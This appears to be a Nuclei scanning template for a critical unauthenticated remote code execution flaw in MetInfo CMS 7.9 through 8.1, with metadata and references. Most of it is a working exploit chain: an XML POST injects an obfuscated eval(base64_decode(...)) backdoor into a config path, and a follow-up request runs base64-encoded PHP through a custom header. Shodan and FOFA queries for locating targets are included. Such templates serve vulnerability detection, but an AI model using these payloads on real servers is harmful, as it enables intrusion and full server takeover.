id: CVE-2026-29014

info:
  name: MetInfo CMS <= 8.1 - Remote Code Execution
  author: 0x_Akoko
  severity: critical
  description: |
   MetInfo CMS 7.9, 8.0, and 8.1 contain an unauthenticated PHP code injection vulnerability caused by insufficient input neutralization in the execution path, letting remote attackers execute arbitrary code remotely, exploit requires crafted requests.
  impact: |
   Remote attackers can execute arbitrary code, gaining full control over the affected server.
  remediation: |
   Update to the latest version beyond 8.1.
  reference:
    - https://karmainsecurity.com/KIS-2026-06
    - https://www.metinfo.cn
    - https://nvd.nist.gov/vuln/detail/CVE-2026-29014
  classification:
    cve-id: CVE-2026-29014
    epss-score: 0.31224
    epss-percentile: 0.96856
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cwe-id: CWE-94
  metadata:
    max-request: 3
    verified: true
    shodan-query: http.title:"MetInfo"
    fofa-query: app="MetInfo"
  tags: cve,cve2026,metinfo,rce,php,vkev

variables:
  num1: "{{rand_int(800000, 999999)}}"
  num2: "{{rand_int(800000, 999999)}}"
  result: "{{to_number(num1)*to_number(num2)}}"


flow: http(1) && http(2) && http(3)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "MetInfo", "mituo")'
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        POST /app/system/entrance.php?n=include&m=module&c=weixin&a=doapi HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/xml

        <x><MsgType>event</MsgType><Event>SCAN</Event><EventKey>adminlogin&#x26;../config/tables</EventKey><FromUserName>{${eval(base64_decode($_SERVER[chr(72).chr(84).chr(84).chr(80).chr(95).chr(67)]))}}.{${die()}}</FromUserName></x>

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "success")'
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        POST /app/system/entrance.php?n=include&m=module&c=weixin&a=doapi HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/xml
        C: {{base64("echo {{num1}}*{{num2}};die();")}}

        <x><MsgType>event</MsgType><Event>SCAN</Event><EventKey>adminlogin&#x26;Array</EventKey></x>

    matchers:
      - type: dsl
        dsl:
          - 'contains(content_type, "text/html")'
          - 'contains(body, "{{result}}")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a0047304502207330c0321530eb37f668d756deb0892e521119d4634a0c6f9be8d89cdc82c8da0221008dedd79ab99281c968cbc41668d41050d292ef515848646463b04d4bf69e3f36:922c64590222798bb761d5b6d8e72950